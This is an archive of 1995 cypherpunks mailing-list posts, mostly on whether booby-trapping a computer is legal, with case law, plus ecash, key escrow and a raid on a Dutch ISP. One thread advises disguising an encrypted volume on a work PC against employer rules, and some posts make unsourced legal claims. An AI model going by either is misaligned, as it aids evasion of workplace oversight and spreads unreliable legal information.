> are not public nuisances where children and pets will inadvertently
> validate Darwin's theory, these are--I think--legal. There may be license
> fees required, to build an electrified fence, but I think it is possible to
> build a lethal voltage electrified fence on one's property.
> 
> Thus, I suspect it is fully legal to build an electrified fence around
> one's PC, providing suitable warnings are included.
> 

As far as I know the owner of property has no legal right to kill a person
either traspassing or stealing it in any of the 50 states. There was a
recent federal ruling that basicly says that if you meet a burglar in your
home at nite you can not kill or otherwise harm them unless you're life is
directly threatened. In short, you MUST give up the ground if at all
possible. Federal and all 50 states (as far as I have been able to
determine) rule human life to have a inherantly higher value than property
of any type (this does not apply to government institutions).

In Texas and all other cattle states that I am aware of, there are specific
laws that limit how much voltage and current capacity an electrified fence
can have. These laws specificaly prohibit any form of lethal installation.
There is no license required nor do you have to mark the fences as electrified.

To address the issue of premeditation in regards to this sort of system,
does attempted murder ring any bells? If the officer(s) have warrents (and
it is not up to the accussed to decide that issue at any time) and you
refuse to assist them you are guilty of a crime (justifiably so).

> I would not call the second type a real booby trap, though some courts
> might, depending. A properly labelled electrified fence seems legal, on
> one's own property, but may not be. And certainly I think any
> explosive-rigged system is illegal, for explosives reasons if not for booby
> trap reasons.
> 

I don't know what you call it but if nothing else it is ethicaly and moraly
reprehinsible.

> I know of no case law on this, and suspect that if an FBI agent were to be
> electrocuted or blown up upon trying to open/use/disconnect the PC, even
> with clear warnings, that a prosecution would happen. Results are unclear
> (to me).
> 
> (I think that if an FBI agent were to be electrocuted while climbing on a
> clearly labelled electrified fence, no prosecution would result.)
> 

Of course not, the FBI as SOP turn the electricity, water, etc. off prior to
assaults. In either case the person responsible for the electrification
would find themselves in court facing some nasty charges. The law does not
recognize the awareness of the victim in these types of cases. It in general
falls to the owner/operator to inshure safe operating conditions. In the
case off electrification this would mean current limiting on the power
supply such that no permanent damage would result to the hapless.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Sep 95 21:29:06 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <v02120d09ac72ae60a310@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950905233610.5629A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> I am wondering about the legalities of booby trapped computer equipment.
> Would it be legal if a clear warning to the fact was posted on the
> hardware?

Generally not.  If you can kill the cops anyway (legally, I mean) 
you might get away with it but remember, Kunstler is dead now so 
getting a good defense might be tough.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 20:57:27 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Growth of actions definded as crime. Which math formula?
In-Reply-To: <v02120d0cac72d4f2b20d@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950905235100.21053A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 20:50:44 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: Growth of actions definded as crime. Which math formula?
> 
> With every session of Congress, previously legal acts become illegal. Has
> anyone worked out a function of this growth (number of crimes in the books
> vs. time)? I am not looking at the numbers of laws passed, but at
> individual acts that are defined to be illegal. If this has been studied,
> what is the formula? If anyone with access to more appropriate lists could
> please give me a pointer/forward the post there, I'd be grateful.
> 
> TIA,
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.

Really it's hard to answer this because what constitutes a "NEW" act is a 
real question in and of itself.

For example, wire fraud.  Is it a "NEW" crime?  Or just a subset of 
fraud, or mail fraud?

Carjacking... is that a new offense?  Or just a solidification and 
increase of punishment for armed robbery unauthorized use of a motor 
vehicle, possession of stolen property, and grand theft auto?

Check forgery now has it's own offense, but is this distinct from forgery?

Most "new offensives" are simply re-classifications of old offenses or 
efforts to move them into the federal arena.

I think the conception that entirely new acts are often made illegal 
(excepting burning the flag or some such) is an erronious one.


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 5 Sep 95 21:13:12 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
In-Reply-To: <199509060153.VAA14379@book.hks.net>
Message-ID: <9509060413.AA00437@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
> The recipient can
> still determine who gets the goods paied for by the "anonymous" ecash by
> conventional means (hint: shipping address), 

...unless the goods are data.

-Futplex    mailto:futplex@pseudonym.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Davidwfox@eworld.com
Date: Wed, 6 Sep 95 00:59:22 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <950906005854_14454028@eWorld.com>
MIME-Version: 1.0
Content-Type: text/plain



----------------------------- Begin Original Text
-----------------------------
Has anyone heard about this bill?  Comments?

Cheers,
Bob Hettinga
----------------------------- End Original Text -----------------------------

There was an investigative article in a recent Readers Digest (no I'm not a
regular reader, heard it through Radio for the Print Handicapped in
Australia) regarding a major counterfieting operation that uses same printing
presses as used by US Treasury. The proceeds amount to BIG numbers and are
used to fund various terrorist organizations.

regards
David Fox
The e-commerce directory
www.kweb.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 6 Sep 95 01:28:08 PDT
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE: September 1995 SF Bay Area physical meeting
Message-ID: <199509060824.BAA02026@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCEMENT
============

What: September 1995 SF Bay Area physical meeting
When: Saturday, 9 September 1995
      12:00 noon - 6:00 p.m.
Where: that hard-to-find loft space at 2nd & Brannan
       where we had July's meeting

This month's meeting is the "Even More Catastrophically Overnamed
Fourth Annual Cypherpunks Conclave, Congress, Schmooze-Fest, Meeting,
and Feast".

It's been three years since the first meeting at my house at the time
in Oakland.  If you only come to one meeting a year, come to this one.
It's canonical.

The agenda for this meeting is completely empty.  I've been out of
town for all but a total of about three weeks since the last meeting
two months ago (and I'm gone the rest of this week and flying in
Saturday morning).  So where in the past we've had something
approaching a schedule, this time I've not made even a pretense at
scheduling.  So just show up -- we always find something good to talk
about.

And besides, if you don't show up, you can't here about my unexpected
genetic discovery!

Directions follow.  See you there.

Eric

-----------------------------------------------------------------------------

Exact Location:  340 Bryant St., 4th floor (top level); SF.

Directions:
1) From the East Bay--Cross the Bay Bridge and take the LEFT
exit for Main St./Embarcadero.  You will be making a series
of LEFT turns as follows :

LEFT on Harrison
LEFT on 2nd
LEFT on Bryant. PARK!  There is parking around the back of
the building, and also across the street.

2) From the Peninsula--101 North, take the 4th Street exit. 
(The last SF Exit before the Bay Bridge.  GET OFF HERE!) 
Follow to the RIGHT onto Bryant.
Once you've crossed Second St., PARK!

3) If you get LOST: Call 415/284-0252.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 22:58:40 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Re: Are booby-trapped... [Detailed treatment]
In-Reply-To: <Pine.SUN.3.91.950905220511.3325B-100000@crl3.crl.com>
Message-ID: <Pine.SUN.3.91.950906014806.24142A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



From tcmay@got.netWed Sep  6 00:30:39 1995
Date: Tue, 5 Sep 1995 20:49:25 -0700
From: "Timothy C. May" <tcmay@got.net>
To: cypherpunks@toad.com
Subject: Are booby-trapped computers legal?


(I've changed the name of this thread.)

At 2:30 AM 9/6/95, Lucky Green wrote:

>>I am wondering about the legalities of booby trapped computer 
equipment.
>>Would it be legal if a clear warning to the fact was posted on the
>>hardware?

>There are two types of "booby traps" to consider:

>* Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if 
>and when a burglar enters. Or an electrified region of a room is set to 
>"get energized" when an intruder enters. These are "surprises" and are 
>canonical booby traps.

>These have been found to be illegal in several court cases. (I'm not a
>lawyer, but I've been reading about them for 20 years. Famous cases 
>where a burglar sued, and won, because he was injured when breaking 
>into a house.)

Katko v. Briney, 183 N.W.2d  657  (Iowa 1971).

The defendants owned an old, boarded-up house, located several miles 
from their home, in which they stored various old bottles, fruit jars 
and the like, which they considered to be antiques.  Several times 
during the previous several years the windows in the house had been 
broken and the entire place "messed up."  The defendants first posted 
"no tresspass" signs to keep off intruders, but the break-ins continued.  
Shortly before the injury to the plaintiff, the defendants placed a 
"shotgun trap" in one of the bedrooms.  The gun was first positioned so 
as to hit an intruder in the stomach, but Mr. Briney, at his wife's 
insistance, lowered it to hit at the legs.  He said that he set the gun 
"because I was mad and tired of being tormented," but insisted that "he 
did not intend to injure anyone."

The plaintiff was shot in the legs and permantly injured when he entered 
the defendant's bedroom shortly after the gun was set.  He had been to 
the place several times before, and had intended upon this occasion to 
steal some of the defendant's possessions.  The plaintiff pleaded guilty 
to a charge of larceny and paid a fine of $50.  He also sued the 
defendant for personal injuries and was awarded $20,000 in actual 
damages and $10,000 in punitive damages.

[Jury instruction #6 was one of the items at issue in the appeal to the 
Iowa Supreme court]

Instruction 6 stated: "An owner of a premises is prohibited from 
willfully or intentionally injuring a tresspasser by means of force that 
either takes life or inflicts great bodily injury and therefore a person 
owning a premise is prohibited from setting out "spring guns" and like 
dangerous devices which will likely take life or inflict great bodily 
injury, for the purpose of harming tresspassers.  The fact that the 
tresspasser may be acting in violation of the law does not change the 
rule.  The only time when such conduct of setting a "spring gun" or a 
like dangerous device is justified would be when the tresspasser was 
committing a felony of violence or a felony punishable by death, or 
where the trespasser was endangering human life by his act."

[Upheld on appeal]

Note that the case caused a literal riot in Iowa.  Checks poured in to 
the Briney's (the boobytrappers) from everywhere (by one account, even 
from prisons).  They raised over $10,000 this way.  Briney was heard to 
comment: "They used booby traps in Viet Nam didn't they?"  Asked if he 
would do it again:  "There's one thing I'd do different, though, I'd 
have aimed that gun a few feet higher."  Reference is given to a front 
page story in the Chicago Trib. of April 25, 1975.

See also, Allison v. Fiscus, 156 Ohio St. 120, 100 N.E.2d 237 (1951).
[Plaintiff could collect damages when he was injured by a booby trap 
consisting of two sticks of dynamite even though he was feloniously 
breaking into defendant's warehouse with intent to steal.]

Some states allow a criminal liability, even of homocide, to landowners 
installing booby traps.

The basic rule today in most states resembles the restatement position:

Section 85.  Use of Mechanical Device Threatening Death or Serious 
Bodily Injury.

The actor is so far privileged to use such a device intended or likely 
to cause serious bodily harm or death for the purpose of protecting his 
land or chattels from intrusion that he is not liable for the serious 
bodily harm or death thereby caused to an intruder whose intrusion is, 
in fact, such that the actor, were he present, would be privileged to 
prevent or terminate it by the intentional infliction of such harm.

Some states have deviated from Section 85, however, California included.

People v. Caballos, 12 Cal. 470, 526 P.2d 241, 116 Cal. Rptr. 233 
(1974).  "It seems clear that the use of such [mechanical] devices 
should not be encouraged.  Moreover, whatever may be thought in torts, 
the [Restatement] rule setting forth an exception to liability for death 
or injuries inflicted by such devices 'is inappropriate in penal law for 
it is obvious that it does not prescribe a workable standard of conduct; 
liability depend on fortuitous results.'  (i.e. what the trespasser was 
doing in there in the first place)

What constitutes reasonable force is generally a question for the jury.  
Some exceptions exist.

When the invasion is peaceful, and in the presence of the possessor, the 
use of any force at all will be unreasonable unless a request has been 
made to depart.  Chapell v. Schmidt, 38 P. 892 (1894) (Defendant caned 
elderly person who was picking flowers); A request need not be made 
however when conduct of the intruder would indicate to a reasonable 
person that it would be useless or that it could not safely be made in 
time.  See Higgins v. Minagham, 47 N.W. 941 (1891).

>* Type 2 Booby Trap: electrified perimeter fences. So long as these are
>adequately marked ("If you touch this fence, you will probably die"), 
>and are not public nuisances where children and pets will inadvertently
>validate Darwin's theory, these are--I think--legal. There may be 
>license fees required, to build an electrified fence, but I think it is 
>possible to build a lethal voltage electrified fence on one's property.


While clear notice of the danger of deadly force is a partial defense to 
criminal and civil liability in some states, (Starkey v. Dameron, 21 
P.2s 1112 (1933) [Colorado] State v. Marfaudille, 92 P. 939 (1907) 
[Washington State]) and implicit or constructive notice in others 
(Quigley v. Clough, 53 N.E. 884 (1899) (Presence of barbed wire may 
constitute notice of deadly or injurious force)), some prohibit it 
outright, notice or not (State v. Plumlee, 149 So. 425 (1933) [La.]

An obnoxiously exhaustive treatement of the entire subject can be found 
in Bohlen and Burns, The privilege to Protect Property by Dangerous 
Barriers and Mechanical Devices, 35 Yale L.J. 535 (1926); or for a more 
interesting treatement (IMHO) Hart, Injuries to Trespassers, 47 Law 
Q.Rev. 92 (1931).


>Thus, I suspect it is fully legal to build an electrified fence around
>one's PC, providing suitable warnings are included.

Varies by state.  If your intent is to prevent ACCESS to the computer, 
as opposed to THEFT, I cannot see how electrocution could be considered 
"reasonable force" to prevent it, given the host of other methods to 
prevent access without harm to the trespasser.

>I would not call the second type a real booby trap, though some courts
>might, depending. A properly labelled electrified fence seems legal, on
>one's own property, but may not be.

I don't know that CRIMINAL liability will insue in those states that 
exempt defenses with warnings, but certainly civil liability might.  
Never know what a jury will do.

>And certainly I think any explosive-rigged system is illegal, for 
>explosives reasons if not for booby trap reasons.

Again, reasonable force will be a question for the jury.  Explosives are 
a bit dramatic for a jury to swollow as "reasonable."  Explosives 
charges will likely be in counts 4&5.

>I know of no case law on this, and suspect that if an FBI agent were to 
>be electrocuted or blown up upon trying to open/use/disconnect the PC, 
>even with clear warnings, that a prosecution would happen. Results are 
>unclear (to me).
>(I think that if an FBI agent were to be electrocuted while climbing on 
>a clearly labelled electrified fence, no prosecution would result.)
>Of course, if a PC were to be clearly labelled as being rigged, then 
>steps could presumably be taken to defuse the arrangement.

Ominously, the possessor is responsible for determining the 
'trespasser's' right to enter the property.  In other words, if a 
officer with legal rights to enter the property was injured or killed by 
a booby trap (warnings or not) liability would almost without question 
insue.  The only defined defense available would be the officer's 
contributatory negligence (ignoring the sign- etc.).

My guess is that FBI enters, sees the PC, calls bomb squad, a member of 
bomb squad is injured by explosive or electrocution or whatever, 
liability insues, warning or not.  At this point warning is not an issue 
as the possessor would not have the right to repell legally entitled 
officers were he present and thus cannot repell them while absent.

I've completely ignored the use of other deadly force in home invasion 
cases.  Mr. Sandfort was pretty close to right on there for Cali.


>--Tim May

>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Carol Anne Braddock)
Date: Tue, 5 Sep 95 23:58:27 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509060658.XAA28913@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Anon.penet.fi succinctly scribed:

>     If a police officer has a warrant then I really don't have much
>     choice about letting him in.  Am I also under an obligation to
>     allow the people who filed for the warrant into my home or
>     business?

The aren't, but they do, and only a good civil rights lawyer
can help you out of the resulting quagmire. It's done in a lot
of civil cases, particularly where restraining orders are used.

Love ALways,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 23:01:11 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Growth of actions definded as crime. Which math formula?
In-Reply-To: <v02120d0fac72f40a1ca9@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950906015851.24246A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 23:01:01 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Growth of actions definded as crime. Which math formula?
> 
> At 23:56 9/5/95, Black Unicorn wrote:
> rypted mail preferred.
> >
> >Really it's hard to answer this because what constitutes a "NEW" act is a
> >real question in and of itself.
> >
> >For example, wire fraud.  Is it a "NEW" crime?  Or just a subset of
> >fraud, or mail fraud?
> 
> If they guy would have gotten away before the new law was passed, it is a
> new crime.

This is very rare.  It's mostly in definitional cases, for example, where 
Extacy was just not defined as a controlled substance some years ago.

Created crimes are few and far between.

There's a lot of jurisprudence.  Criminals are creative, but there are 
only so many things that can't be covered by "Fraud."

> 
> That's the stats I am looking for.
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 5 Sep 95 17:25:23 PDT
To: A.W.S.Helwig@ET.TUDelft.NL
Subject: Secure Device 1.4 QuestionSecure Device 1.4 Question
Message-ID: <199509060025.CAA05098@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I just installed Secure Device, v1.4 on a PC at work.  After 
installing it, I looked at the encrypted volume and found the string 
"SECDEV  " starting at the fourth byte of the file.  I'd prefer that 
this file look like some temporary file that got left on the disk by 
a program that didn't clean up properly after itself, and not be 
identifiable as an encrypted volume.

Is there a way to get Secure Device to not leave identifiable 
plaintext like that in the file?  Will I do any harm to the file if 
I replace that string with blanks, or something more innocuous?  If 
it's required to be there, then I'd like to put its removal on the 
"wish list" for the next version.  (I copied the file, replaced the 
string "SECDEV" with blanks using a hex editor, and then mounted the 
copy as an encrypted volume, and it seems to be working OK, but I 
wanted to make sure this won't cause unforseen problems in the 
future.)

As you've probably guessed, I'm not supposed to have any personal 
files on my work computer, and an entire encrypted volume would 
undoubtedly make someone go ballistic if they discovered it.  When I 
want to use my encrypted file system, I reboot off of a floppy, and 
all Secure Device programs and drivers are kept on the floppy.  The 
only thing that has to be left on the hard drive is the encrypted 
volume itself.

Please post a copy of any replies to the Cypherpunks mailing list at 
"cypherpunks@toad.com".  Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:40:44 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509060638.CAA15606@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509060432.VAA05003@jobe.shell.portal.com>,
hfinney@shell.portal.com (Hal) wrote:

>P.S. Without seeing the technical specs it is hard to describe in detail,
>but generally Chaumian ecash allows fully anonymous coerced transfers.
>The payee/coercer supplies the blinded coins and forces the payor to use
>them to make withdrawals from his account.  The resulting signed
>tokens are passed to the coercer who unblinds them and now has fully
>anonymous, untraceable cash tokens which he can spend.

Assuming it can be done (I am checking), he would also have a large
balance on his non-anoymous Ecash account that he would have a very hard
time explaining to the IRS, FINsomething [sorry, forgot the name], and
other interested and certainly to be involved parties. Cyberspace is much
closer connected to the real world as many people on this list, myself
included, would like to think it is.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBME1B1SoZzwIn1bdtAQF7FwGAgqmPsLaol1LbR2zb+FI7nmYDlp7BY91G
SsT6iJukYmiKzcmG4YNPtGJ8QCrUGkZo
=CNiP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:43:14 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509060640.CAA15617@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509060434.AA09596@anon.penet.fi>, an253398@anon.penet.fi
(Mole Rat) wrote:

>     This is the second or third time I've seen descriptions of such
>     raids where cult (no, I'm not trying to be diplomatic)
>     representatives were present and participating.  Is this legal in
>     Amsterdam?  How about in the U.S.?  Britain?
>
>     If a police officer has a warrant then I really don't have much
>     choice about letting him in.  Am I also under an obligation to
>     allow the people who filed for the warrant into my home or
>     business?

I doubt it. Get a good attorney.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBME1CaSoZzwIn1bdtAQGGyAF7BojcAMnxvfMcyJSWLHlJe0d0QezwdVGZ
paDopX2LMcxjuUgupNXgF1GwRPbvx2dl
=Dstl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an253398@anon.penet.fi (Mole Rat)
Date: Tue, 5 Sep 95 22:07:21 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <9509060434.AA09596@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


announce@xs4all.nl writes:
     [ snip ]
 >     Police and members of Scientology church enter offices of XS4ALL
 >     ================================================================
 > 
 > Amsterdam - thuesday september 5, 1995.
 > 
 > Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
 > bailiff. He was acting on behalf of the Religious
 > Technology Centre, better known as the Scientology Church, or
 > Scientology for short. He was assisted by a local police officer and Mr.
 > Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
 > in The Netherlands. Also present were two computer experts (Mr. Ootjes
 > and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
 > two American employees of Scientology, Mr. Weightman and Ms. Jenssen.
     [ snip ]

     This is the second or third time I've seen descriptions of such
     raids where cult (no, I'm not trying to be diplomatic)
     representatives were present and participating.  Is this legal in
     Amsterdam?  How about in the U.S.?  Britain?

     If a police officer has a warrant then I really don't have much
     choice about letting him in.  Am I also under an obligation to
     allow the people who filed for the warrant into my home or
     business?

     Thanks,

     Mole Rat
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 01:57:46 PDT
To: jim@rand.org (Jim Gillogly)
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <199509060858.EAA15990@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Key Escrow Issues Meeting, September 6-7, 1995
> Discussion Paper #3
> 
>                  Export Criteria Discussion Draft --
>                 64-bit Software Key Escrow Encryption

Pardon my obvious question, but if there's some sort of GAK/LEAF, then
why limit it to 64-bit? It seems possible that the assumption is 'just
in case the GAK is tampered with' there's still a chance of cracking it,
should the need arise.

[..]

I'm wondering just how securely a hack-proof escrow system can be written.
It seems that someone can always go in with a sophisticated debugger and
do some tampering of the software.

And one need not mention the what-if-foreign-competitors-do-not-implement-
this-scheme? question...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 02:14:01 PDT
To: cypherpunks@toad.com
Subject: Re: Secure Device 1.4 Question
In-Reply-To: <199509060025.CAA05098@utopia.hacktic.nl>
Message-ID: <199509060915.FAA16064@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> I just installed Secure Device, v1.4 on a PC at work.  After 
> installing it, I looked at the encrypted volume and found the string 
> "SECDEV  " starting at the fourth byte of the file.  I'd prefer that 
> this file look like some temporary file that got left on the disk by 
> a program that didn't clean up properly after itself, and not be 
> identifiable as an encrypted volume.

Problems with that:
  1. SecDev needs a way to easily ID it's own files. Encrypting a known
     ID string would be a weakness (known plaintext) so it's better to
     have a plaintext identifyer.

  2. If someone thinks it's a lost TMP file they will delete it. Not a
     risk you want.  It's better if they think it's a strange type of
     swap file or something needed by an application.


[..]

Source is available... so you can change the ID string in source to
something innocuous yet unique and recompile it.

> As you've probably guessed, I'm not supposed to have any personal 
> files on my work computer, and an entire encrypted volume would 
> undoubtedly make someone go ballistic if they discovered it.  When I 
> want to use my encrypted file system, I reboot off of a floppy, and 
> all Secure Device programs and drivers are kept on the floppy.  The 
> only thing that has to be left on the hard drive is the encrypted 
> volume itself.

Well, there's a risk of someone seeing a mysterious file and deleting
it anyway... assuming they don't go ballistic over it anyhow.

There's also a risk of someone peering over your shoulder and noticing
that something's afoot as well, is there not?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Wed, 6 Sep 95 00:12:45 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
Message-ID: <9509060647.AA14769@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>       Verisign is a spin off of RSA.

Verisign, Inc. (VERISIGN-DOM)
   100 Marine Parkway, Suite 525
   Redwood City, CA  94065

   Domain Name: VERISIGN.COM

   Administrative Contact, Technical Contact, Zone Contact:
      Taylor, Simon  (ST192)  simon@RSA.COM
      (415) 508-1151

   Record last updated on 21-Jun-95.

DEADBEAT

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAgUBME0AO/FZTpBW/B35AQFdLAGAiV1RqNmLh5W+uuHeKsXX/819qK5WTq3Y
TobFKWLxkTjkEwDs6Js7UB2PFRnt6gDk
=HEHU
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <tunny@Inference.COM>
Date: Wed, 6 Sep 95 07:49:18 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: Equinox/cypherpunks/www
Message-ID: <304DB3A8@smtp-pc>
MIME-Version: 1.0
Content-Type: text/plain



> Anyone that missed or was unable to get the UK TV programme Equinox
> might like to take a look at:
>
>   
http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html
>
> - Andy

Thanks for the pointer.  I was reading through their nicely
organized gentle introduction to basic concepts, when I nearly
sprayed coffee all over my monitor from laughing so hard at
the following gaffe:

"...most modern codes rely on the intractable mathematical
problem of 'factorisation'. This is the process of trying to
find the two prime factors that, multiplied together, would
give you a third prime number. [JT: Yes, I'd call that an
intractable problem, all right.] For example, if you take
3337 - a prime number (i.e. a number that has precisely two
divisors) - how would you find its two prime factors? (They
are, in fact, 47 and 71.)"

A little unclear on that "prime" thing, it sounds like... :-)

 - Tunny
______________________________________________________________________
James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
tunny@Inference.com    | <--finger for key  36 07 D9 33 3D 32 53 9C
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 6 Sep 95 06:13:41 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <v02120d08ac72acec4bb0@[192.0.2.1]>
Message-ID: <9509061312.AA12676@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
 > Windows 95 is on a lot of people's hard drives. It is therefore public and
 > available for every one's inspection.  How many people do you know that
 > have reverse engineered Windows 95. How many of those use a reverse
 > engineered version. I'd venture it is zero out of zero.

Problems with this analogy:

1) Windows 95 is somewhat bigger than your typical encryption
routine;

2) The factor of motivation isn't considered.

